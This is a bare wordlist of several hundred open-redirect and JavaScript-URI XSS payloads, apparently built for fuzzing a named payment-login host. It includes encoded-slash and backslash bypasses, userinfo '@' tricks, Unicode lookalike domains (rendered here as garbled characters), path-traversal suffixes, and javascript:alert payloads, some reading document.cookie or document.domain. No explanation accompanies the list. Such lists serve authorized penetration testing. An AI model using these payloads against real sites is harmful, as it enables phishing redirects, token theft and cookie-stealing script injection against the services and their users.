";alert(0);//
#//localdomain.pw
#//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
%01https://localdomain.pw
%01https://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
%09Jav%09ascript:alert(1)
%09Jav%09ascript:alert(document.domain)
%0A/localdomain.pw
%0A/â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aalert(1)
%19Jav%09asc%09ript:https%20://id.cloudpayments.ru/%250Aconfirm%25281%2529
%252F@localdomain.pw
%252F@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d
%68%74%74%70%73%3a%2f%2f%6c%6f%63%61%6c%64%6f%6d%61%69%6e%2e%70%77
.localdomain.pw
.â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/#//localdomain.pw
/#//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/%09/example.com
/%09/example.com@google.com
/%09/google.com
/%09/javascript:alert(1)
/%09/javascript:alert(1);
/%09/localdomain.pw
/%09/id.cloudpayments.ru@google.com
/%09/id.cloudpayments.ru@localdomain.pw
/%09/id.cloudpayments.ru@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/%09/â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/%2F/localdomain.pw
/%2F/â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/%2f%2f%2fbing.com%2f%3fwww.omise.co
/%2f%2fexample.com
/%2f%2fgoogle.com
/%2f%2flocaldomain.pw
/%2f%2fâ“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/%2f%5c%2f%67%6f%6f%67%6c%65%2e%63%6f%6d/
/%2f%5c%2f%6c%6f%63%61%6c%64%6f%6d%61%69%6e%2e%70%77/
/%5cexample.com
/%5cexample.com@google.com
/%5cgoogle.com
/%5cjavascript:alert(1)
/%5cjavascript:alert(1);
/%5clocaldomain.pw
/%5cid.cloudpayments.ru@google.com
/%5cid.cloudpayments.ru@localdomain.pw
/%5cid.cloudpayments.ru@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/%5câ“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d
/.example.com
/.google.com
/.localdomain.pw
/.â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
//%09/example.com
//%09/example.com@google.com
//%09/google.com
//%09/localdomain.pw
//%09/id.cloudpayments.ru@google.com
//%09/id.cloudpayments.ru@localdomain.pw
//%09/id.cloudpayments.ru@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
//%09/â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
//%2f%2flocaldomain.pw
//%2f%2fâ“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
//%2fxgoogle.com
//%5cexample.com
//%5cexample.com@google.com
//%5cgoogle.com
//%5cjavascript:alert(1)
//%5cjavascript:alert(1);
//%5clocaldomain.pw
//%5cid.cloudpayments.ru@google.com
//%5cid.cloudpayments.ru@localdomain.pw
//%5cid.cloudpayments.ru@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
//%5câ“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
//.@.@localdomain.pw
//.@.@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
///%09/example.com
///%09/example.com@google.com
///%09/google.com
///%09/localdomain.pw
///%09/id.cloudpayments.ru@google.com
///%09/id.cloudpayments.ru@localdomain.pw
///%09/id.cloudpayments.ru@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
///%09/â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
///%5cexample.com
///%5cexample.com@google.com
///%5cgoogle.com
///%5clocaldomain.pw
///%5cid.cloudpayments.ru@google.com
///%5cid.cloudpayments.ru@localdomain.pw
///%5cid.cloudpayments.ru@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
///%5câ“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
////%09/example.com
////%09/example.com@google.com
////%09/google.com
////%09/localdomain.pw
////%09/id.cloudpayments.ru@google.com
////%09/id.cloudpayments.ru@localdomain.pw
////%09/id.cloudpayments.ru@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
////%09/â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
////%5cexample.com
////%5cexample.com@google.com
////%5cgoogle.com
////%5clocaldomain.pw
////%5cid.cloudpayments.ru@google.com
////%5cid.cloudpayments.ru@localdomain.pw
////%5cid.cloudpayments.ru@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
////%5câ“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/////example.com
/////example.com/
/////google.com/
/////localdomain.pw
/////localdomain.pw/
/////â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/////â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
////\;@example.com
////example.com/
////example.com/%2e%2e
////example.com/%2e%2e%2f
////example.com/%2f%2e%2e
////example.com/%2f..
////example.com//
////example.com@google.com/
////example.com@google.com/%2e%2e
////example.com@google.com/%2e%2e%2f
////example.com@google.com/%2f%2e%2e
////example.com@google.com/%2f..
////example.com@google.com//
////google.com/
////google.com/%2e%2e
////google.com/%2e%2e%2f
////google.com/%2f%2e%2e
////google.com/%2f..
////google.com//
////localdomain.pw/
////localdomain.pw/%2e%2e
////localdomain.pw/%2e%2e%2f
////localdomain.pw/%2f%2e%2e
////localdomain.pw/%2f..
////localdomain.pw//
////localdomainã€‚pw
////www.google.com/%2e%2e
////www.google.com/%2e%2e%2f
////www.google.com/%2f%2e%2e
////id.cloudpayments.ru@google.com/
////id.cloudpayments.ru@google.com/%2f..
////id.cloudpayments.ru@google.com//
////id.cloudpayments.ru@localdomain.pw/
////id.cloudpayments.ru@localdomain.pw/%2e%2e
////id.cloudpayments.ru@localdomain.pw/%2e%2e%2f
////id.cloudpayments.ru@localdomain.pw/%2f%2e%2e
////id.cloudpayments.ru@localdomain.pw/%2f..
////id.cloudpayments.ru@localdomain.pw//
////id.cloudpayments.ru@www.google.com/%2e%2e
////id.cloudpayments.ru@www.google.com/%2e%2e%2f
////id.cloudpayments.ru@www.google.com/%2f%2e%2e
////id.cloudpayments.ru@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
////id.cloudpayments.ru@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e
////id.cloudpayments.ru@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e%2f
////id.cloudpayments.ru@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
////id.cloudpayments.ru@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f..
////id.cloudpayments.ru@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦//
////â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒã€‚ï¼°â“¦
////â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
////â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e
////â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e%2f
////â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
////â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f..
////â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦//
///\;@example.com
///\;@google.com
///\;@localdomain.pw
///\;@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
///\ï¹”@localdomain.pw
///\ï¹”@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
///example.com
///example.com/
///example.com/%2e%2e
///example.com/%2e%2e%2f
///example.com/%2f%2e%2e
///example.com/%2f..
///example.com//
///example.com@google.com/
///example.com@google.com/%2e%2e
///example.com@google.com/%2e%2e%2f
///example.com@google.com/%2f%2e%2e
///example.com@google.com/%2f..
///example.com@google.com//
///google.com
///google.com/
///google.com/%2e%2e
///google.com/%2e%2e%2f
///google.com/%2f%2e%2e
///google.com/%2f..
///google.com//
///localdomain.pw
///localdomain.pw/
///localdomain.pw/%2e%2e
///localdomain.pw/%2e%2e%2f
///localdomain.pw/%2f%2e%2e
///localdomain.pw/%2f..
///localdomain.pw//
///www.google.com/%2e%2e
///www.google.com/%2e%2e%2f
///www.google.com/%2f%2e%2e
///id.cloudpayments.ru@google.com/
///id.cloudpayments.ru@google.com/%2f..
///id.cloudpayments.ru@google.com//
///id.cloudpayments.ru@localdomain.pw/
///id.cloudpayments.ru@localdomain.pw/%2e%2e
///id.cloudpayments.ru@localdomain.pw/%2e%2e%2f
///id.cloudpayments.ru@localdomain.pw/%2f%2e%2e
///id.cloudpayments.ru@localdomain.pw/%2f..
///id.cloudpayments.ru@localdomain.pw//
///id.cloudpayments.ru@www.google.com/%2e%2e
///id.cloudpayments.ru@www.google.com/%2e%2e%2f
///id.cloudpayments.ru@www.google.com/%2f%2e%2e
///id.cloudpayments.ru@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
///id.cloudpayments.ru@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e
///id.cloudpayments.ru@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e%2f
///id.cloudpayments.ru@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
///id.cloudpayments.ru@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f..
///id.cloudpayments.ru@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦//
///â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
///â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
///â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e
///â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e%2f
///â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
///â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f..
///â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦//
//3H6k7lIAiqjfNeN@example.com+@google.com/
//3H6k7lIAiqjfNeN@example.com@google.com/
//3H6k7lIAiqjfNeN@id.cloudpayments.ru+@localdomain.pw/
//3H6k7lIAiqjfNeN@id.cloudpayments.ru+@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
//3H6k7lIAiqjfNeN@id.cloudpayments.ru@localdomain.pw/
//3H6k7lIAiqjfNeN@id.cloudpayments.ru@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
//3H6k7lIAiqjfNeN@id.cloudpayments.ruâº@localdomain.pw/
//3H6k7lIAiqjfNeN@id.cloudpayments.ruâº@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
//;@google.com
//;@localdomain.pw
//;@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
//XY>.7d8T\205pZM@example.com+@google.com/
//XY>.7d8T\205pZM@example.com@google.com/
//XY>.7d8T\205pZM@id.cloudpayments.ru+@localdomain.pw/
//XY>.7d8T\205pZM@id.cloudpayments.ru+@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
//XY>.7d8T\205pZM@id.cloudpayments.ru@localdomain.pw/
//XY>.7d8T\205pZM@id.cloudpayments.ru@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
//XY>.7d8T\205pZM@id.cloudpayments.ruâº@localdomain.pw/
//XY>.7d8T\205pZM@id.cloudpayments.ruâº@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
//\/localdomain.pw/
//\/â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
//example.com
//example.com+&@google.com#+@example.com/
//example.com/
//example.com/%2e%2e
//example.com/%2e%2e%2f
//example.com/%2f%2e%2e
//example.com/%2f..
//example.com//
//example.com@google.com/
//example.com@google.com/%2e%2e%2f
//example.com@google.com/%2f%2e%2e
//example.com@google.com/%2f..
//example.com@google.com//
//example.com@https:///google.com/%2e%2e
//google%00.com
//google%E3%80%82com
//google.com
//google.com/
//google.com/%2e%2e%2f
//google.com/%2f%2e%2e
//google.com/%2f..
//google.com//
//google.com:80#@example.com/
//google.com:80?@example.com/
//google.com\@example.com
//google.com\@id.cloudpayments.ru
//google.com\texample.com/
//https:///example.com/%2e%2e
//https:///google.com/%2e%2e
//https:///localdomain.pw/%2e%2e
//https:///www.google.com/%2e%2e
//https:///â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e
//https://example.com/%2e%2e%2f
//https://example.com//
//https://example.com@google.com/%2e%2e%2f
//https://example.com@google.com//
//https://google.com/%2e%2e%2f
//https://google.com//
//https://localdomain.pw/%2e%2e%2f
//https://localdomain.pw//
//https://www.google.com/%2e%2e%2f
//https://id.cloudpayments.ru@google.com//
//https://id.cloudpayments.ru@localdomain.pw/%2e%2e%2f
//https://id.cloudpayments.ru@localdomain.pw//
//https://id.cloudpayments.ru@www.google.com/%2e%2e%2f
//https://id.cloudpayments.ru@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e%2f
//https://id.cloudpayments.ru@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦//
//https://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e%2f
//https://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦//
//javascript:alert(1)
//javascript:alert(1);
//localdomain%00.pw
//localdomain%E3%80%82pw
//localdomain.pw
//localdomain.pw%23@id.cloudpayments.ru
//localdomain.pw%FF@id.cloudpayments.ru
//localdomain.pw/
//localdomain.pw/%2e%2e%2f
//localdomain.pw/%2f%2e%2e
//localdomain.pw/%2f..
//localdomain.pw//
//localdomain.pw/id.cloudpayments.ru
//localdomain.pw:80#@id.cloudpayments.ru/
//localdomain.pw:80?@id.cloudpayments.ru/
//localdomain.pw?
//localdomain.pw\@.id.cloudpayments.ru
//localdomain.pw\@id.cloudpayments.ru
//localdomain.pw\\@.id.cloudpayments.ru
//localdomain.pw\tid.cloudpayments.ru/
//localdomain.pw\udfff@id.cloudpayments.ru/
//localdomain.pwï¿½@id.cloudpayments.ru/
//localdomainï½¡pw\áµ—id.cloudpayments.ru
//www.google.com/%2e%2e%2f
//www.google.com/%2f%2e%2e
//id.cloudpayments.ru+&@localdomain.pw#+@id.cloudpayments.ru/
//id.cloudpayments.ru+&@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦#+@id.cloudpayments.ru/
//id.cloudpayments.ru/../..%20.localdomain.pw
//id.cloudpayments.ru/../..%20.â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
//id.cloudpayments.ru@google.com/
//id.cloudpayments.ru@google.com/%2f..
//id.cloudpayments.ru@google.com//
//id.cloudpayments.ru@https:///localdomain.pw/%2e%2e
//id.cloudpayments.ru@https:///www.google.com/%2e%2e
//id.cloudpayments.ru@https:///â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e
//id.cloudpayments.ru@localdomain.pw/
//id.cloudpayments.ru@localdomain.pw/%2e%2e%2f
//id.cloudpayments.ru@localdomain.pw/%2f%2e%2e
//id.cloudpayments.ru@localdomain.pw/%2f..
//id.cloudpayments.ru@localdomain.pw//
//id.cloudpayments.ru@www.google.com/%2e%2e%2f
//id.cloudpayments.ru@www.google.com/%2f%2e%2e
//id.cloudpayments.ru@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
//id.cloudpayments.ru@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e%2f
//id.cloudpayments.ru@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
//id.cloudpayments.ru@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f..
//id.cloudpayments.ru@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦//
//id.cloudpayments.ruâº&@localdomain.pw#âº@id.cloudpayments.ru/
//id.cloudpayments.ruâº&@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦#âº@id.cloudpayments.ru/
//id.cloudpayments.ruï½¡â‚¨/
//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒ%00ï½¡ï¼°â“¦
//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒ%E3%80%82pw
//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦%23@id.cloudpayments.ru
//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦%FF@id.cloudpayments.ru
//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e%2f
//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f..
//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦//
//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/id.cloudpayments.ru
//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦:80#@id.cloudpayments.ru/
//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦:80?@id.cloudpayments.ru/
//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦?
//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦\@.id.cloudpayments.ru
//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦\@id.cloudpayments.ru
//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦\\@.id.cloudpayments.ru
//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦\tid.cloudpayments.ru/
//ï¹”@localdomain.pw
//ï¹”@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/<>//example.com
/?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com&redirect_uri=//example.com
/?url=/\/example.com&next=/\/example.com&redirect=/\/example.com&redirect_uri=/\/example.com
/?url=Https://example.com&next=Https://example.com&redirect=Https://example.com&redir=Https://example.com&rurl=Https://example.com&redirect_uri=Https://example.com
/ReceiveAutoRedirect/false?desiredLocationUrl=http://xssposed.org
/\/\/example.com/
/\/example.com/
/\/google.com/
/\/localdomain.pw/
/\/â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
/example.com/%2f%2e%2e
/google.com/%2f%2e%2e
/http://%67%6f%6f%67%6c%65%2e%63%6f%6d
/http://example.com
/http://google.com
/http://localdomain.pw
/http://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/http:/example.com
/http:/google.com
/http:/localdomain.pw
/http:/â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/https:/%5cexample.com/
/https:/%5cgoogle.com/
/https:/%5clocaldomain.pw/
/https:/%5câ“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
/https://%09/example.com
/https://%5cexample.com
/https://%5cexample.com@google.com
/https://%5cgoogle.com
/https://%5clocaldomain.pw
/https://%5cid.cloudpayments.ru@google.com
/https://%5cid.cloudpayments.ru@localdomain.pw
/https://%5cid.cloudpayments.ru@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/https://%5câ“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/https:///example.com/%2e%2e
/https:///example.com/%2f%2e%2e
/https:///example.com@google.com/%2f%2e%2e
/https:///google.com/%2f%2e%2e
/https:///localdomain.pw/%2f%2e%2e
/https:///www.google.com/%2f%2e%2e
/https:///id.cloudpayments.ru@localdomain.pw/%2f%2e%2e
/https:///id.cloudpayments.ru@www.google.com/%2f%2e%2e
/https:///id.cloudpayments.ru@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
/https:///â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
/https://example.com
/https://example.com/
/https://example.com/%2e%2e
/https://example.com/%2e%2e%2f
/https://example.com/%2f%2e%2e
/https://example.com/%2f..
/https://example.com//
/https://example.com@google.com/
/https://example.com@google.com/%2e%2e
/https://example.com@google.com/%2f%2e%2e
/https://example.com@google.com/%2f..
/https://google.com/
/https://google.com/%2e%2e
/https://google.com/%2f%2e%2e
/https://google.com/%2f..
/https://localdomain.pw/
/https://localdomain.pw/%2e%2e
/https://localdomain.pw/%2f%2e%2e
/https://localdomain.pw/%2f..
/https://www.google.com/%2e%2e
/https://www.google.com/%2f%2e%2e
/https://id.cloudpayments.ru@google.com/
/https://id.cloudpayments.ru@google.com/%2f..
/https://id.cloudpayments.ru@localdomain.pw/
/https://id.cloudpayments.ru@localdomain.pw/%2e%2e
/https://id.cloudpayments.ru@localdomain.pw/%2f%2e%2e
/https://id.cloudpayments.ru@localdomain.pw/%2f..
/https://id.cloudpayments.ru@www.google.com/%2e%2e
/https://id.cloudpayments.ru@www.google.com/%2f%2e%2e
/https://id.cloudpayments.ru@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
/https://id.cloudpayments.ru@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e
/https://id.cloudpayments.ru@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
/https://id.cloudpayments.ru@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f..
/https://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
/https://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e
/https://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
/https://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f..
/https:example.com
/javascript:alert(1)
/javascript:alert(1);
/localdomain.pw/%2f%2e%2e
/redirect?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com&redirect_uri=//example.com
/redirect?url=/\/example.com&next=/\/example.com&redirect=/\/example.com&redir=/\/example.com&rurl=/\/example.com&redirect_uri=/\/example.com
/redirect?url=Https://example.com&next=Https://example.com&redirect=Https://example.com&redir=Https://example.com&rurl=Https://example.com&redirect_uri=Https://example.com
/x:1/:///%01javascript:alert(document.cookie)/
/â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
/ã€±google.com
/ã€±localdomain.pw
/ã€±â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/ã€µgoogle.com
/ã€µlocaldomain.pw
/ã€µâ“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/ã‚google.com
/ã‚localdomain.pw
/ã‚â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/ãƒ¼google.com
/ãƒ¼localdomain.pw
/ãƒ¼â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/ï½°google.com
/ï½°localdomain.pw
/ï½°â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
<>//google.com
<>//localdomain.pw
<>//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
<>javascript:alert(1);
@google.com
@localdomain.pw
@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
Javas%26%2399;ript:alert(1)
Javascript://%E2%80%A9alert(618)
